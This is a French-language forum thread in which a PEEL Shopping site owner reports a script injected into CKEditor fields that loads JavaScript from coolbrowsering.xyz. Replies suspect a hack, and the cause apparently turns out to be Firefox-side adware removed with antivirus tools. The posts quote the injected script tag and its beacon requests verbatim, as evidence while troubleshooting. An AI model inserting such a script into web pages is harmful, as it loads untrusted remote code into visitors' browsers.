Bug dans les éditeurs de texte

4 messages dans ce sujet

Posté(e) (modifié) · Signaler ce message

Bonjour,

J'ai trois sites sur des versions 6.3. Ils sont sur des hébergements différents, il est donc peu probable qu'ils aient eu un virus. Je viens de faire un test avec une version 9.0 de Peel et je retrouve le même problème.

Je rencontre donc ce bug depuis dimanche dernier : Lorsque je clique dans le champ d'édition (branché avec CKEditor) de chacun des sites (j'ai fait le test avec FCK editor et CKEditor), j'ai ce code qui apparait immédiatement après dans la source : <script charset="UTF-8">
ss78mest = {"distributorId":"8","kTag":"0","pTag":"0","scriptDomain":"coolbrowsering.xyz","tag":"pl","uniqueID":"1552592168405","vTag":"28069","version":"200"};
tdUserStorage = {"browserStartedAt":1552985758398};
window["pTag84719287"] = "0";
window["jj837711"] = "1552592168405";</script>
<script charset="UTF-8" src="http://coolbrowsering.xyz/i.js?tag=pl&amp;did=8&amp;v_tag=28069&amp;k_tag=0">
</script>

Le code n'apparait que quand je clique dans le champ d'édition de contenu de l'éditeur, car quand la page est tout juste chargée, le terme "coolbrowsering" par exemple, n'apparait pas dans la source de la page.

Ce qui n'arrivait pas auparavant, c'est dimanche dernier que je m'en suis rendu compte, en allant sur un de ces 4 sites. Je travaille tous les jours dessus, donc si cela s'était produit avant, je l'aurais vu. Je n'ai fait aucune mise à jour de code ou de version php, et je me suis renseigné chez l'hébergeur, il n'y a pas eu de mise à jour non plus du côté des hébergements.

Savez-vous ce qui peut se passer.

Merci.

acnt?_=1553006178878&did=8&tag=pl&r=abou

acnt?_=1553006587233&did=8&tag=pl&r=abou

acnt?_=1553006660196&did=8&tag=pl&r=abou

acnt?_=1553008928245&did=8&tag=pl&r=abou

acnt?_=1553009392266&did=8&tag=pl&r=abou

Modifié (le) par xeon

Partager ce message


Lien à poster
Partager sur d’autres sites

Posté(e) · Signaler ce message

Bonjour,

Cela ressemble bien a un piratage de vos sites. Peut-être avez vous un virus sur votre ordinateur, qui a pu récupérer et transmettre les identifiants FTP de vos sites.
Sur le serveur vous pouvez vérifier les dates de mises à jour dans les dossiers lib/ckeditor et lib/FCKeditor pour constater si il y a un fichier mis à jour récemment dans ces dossiers.
Je vous invite à faire un scan antivirus de votre ordinateur et modifier les mots de passes des comptes FTP des sites concernés.

Partager ce message


Lien à poster
Partager sur d’autres sites

Posté(e) · Signaler ce message

Je viens d'effectuer un test avec Chrome, et là le code ne s'inscrit pas dans le champ du formulaire. Ce "virus" serait alors lié au navigateur utilisé. En l'occurrence Firefox.

acnt?_=1553006576859&did=8&tag=pl&r=abou

acnt?_=1553006593388&did=8&tag=pl&r=abou

acnt?_=1553006699244&did=8&tag=pl&r=abou

acnt?_=1553008840929&did=8&tag=pl&r=abou

acnt?_=1553008979044&did=8&tag=pl&r=abou

acnt?_=1553009384216&did=8&tag=pl&r=abou

acnt?_=1553009485583&did=8&tag=pl&r=abou

acnt?_=1553020474614&did=8&tag=pl&r=abou

acnt?_=1553069587967&did=8&tag=pl&r=abou

Partager ce message


Lien à poster
Partager sur d’autres sites

Posté(e) · Signaler ce message

J'ai fini par l'avoir je crois. Avec toute une batterie d'anti-virus, le dernier utilisé : Comodo.

acnt?_=1553070547494&did=8&tag=pl&r=abou

acnt?_=1553078638503&did=8&tag=pl&r=abou

acnt?_=1553082589813&did=8&tag=pl&r=abou

acnt?_=1553107523448&did=8&tag=pl&r=abou

Partager ce message


Lien à poster
Partager sur d’autres sites

Créer un compte ou se connecter pour commenter

Vous devez être membre afin de pouvoir déposer un commentaire

Créer un compte

Créez un compte sur notre communauté. C’est facile !


Créer un nouveau compte

Se connecter

Vous avez déjà un compte ? Connectez-vous ici.


Connectez-vous maintenant

Twitter Advisto ecommerce

Facebook PEEL Shopping